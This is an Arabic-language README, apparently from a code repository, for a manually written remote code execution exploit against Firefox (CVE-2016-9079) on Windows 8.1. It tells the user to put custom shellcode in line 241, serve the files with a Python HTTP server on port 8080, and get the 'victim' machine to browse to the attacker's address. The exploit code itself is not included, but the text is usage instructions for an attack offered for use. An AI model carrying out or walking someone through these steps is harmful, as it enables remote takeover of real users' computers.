
استغلال يدوي لـ Firefox RCE CVE-2016-9079 مع شيل كود قابل للتخصيص، يتم تقديمه عبر HTTP لتنفيذ التعليمات البرمجية عن بعد على أنظمة Windows الضعيفة.
هذا استغلال يدوي لـ https://www.exploit-db.com/exploits/41151، ويوجد استغلال آخر لنظام ويندوز 10 (https://github.com/soham23/firefox-rce-nssmil) لكنه لم يعمل على ويندوز 8.1، لذلك صنعت نسختي الخاصة.
يجب عليك تعديل السطر 241 مع شيلكود خاص بك. يوجد مثال فوق هذا السطر.
قم بتنزيل المستودع، ثم شغّل خادمًا. استخدام خادم بايثون يعمل بشكل جيد.
python3 -m http.server 8080
على جهاز الضحية، انتقل إلى http://<attacker_ip>:8080/ ويجب أن يعمل.
تم اختباره على ويندوز 8.1 إنتربرايز x64 باستخدام فايرفوكس 38.